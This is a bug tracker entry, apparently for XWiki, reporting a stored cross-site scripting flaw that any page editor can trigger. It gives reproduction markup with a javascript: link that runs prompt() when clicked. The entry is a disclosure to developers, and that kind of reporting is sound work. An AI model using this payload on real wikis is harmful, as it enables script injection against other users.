Details
-
Bug
-
Resolution: Duplicate
-
Critical
-
None
-
13.9
-
None
-
Unknown
-
N/A
-
N/A
-
Description
Anyone with write access to a XWiki page can introduce a stored XSS to the page. For more details about the impact: https://cwe.mitre.org/data/definitions/79.html
Reproduction:
a) create a wiki page
b) edit source and write:
((( (% class="showhidebutton" %) ((( [[Show Example>>path:javascript:prompt("xss on", window.location.hostname)||aria-controls="showhidecontentcontainerinstance-1" data-hide-message="Collapse" data-show-duration="200" data-show-effect="toggle" data-show-message="Show Example" id="showhidebuttontextinstance-1" role="button" style="cursor:pointer"]] ))) (% id="showhidecontentinstance-1" style="display: none;" class="showhidecontent" %) ((( (% aria-expanded="false" id="showhidecontentcontainerinstance-1" role="region" tabindex="-1" class="contentcontainer" %) ((( (% class="box" %) ((( (% class="code" %) (((
c) save and click on show example
Attachments
Issue Links
- duplicates
-
XRENDERING-663 XSS Javascript injection via XWiki 2.x syntax
- Closed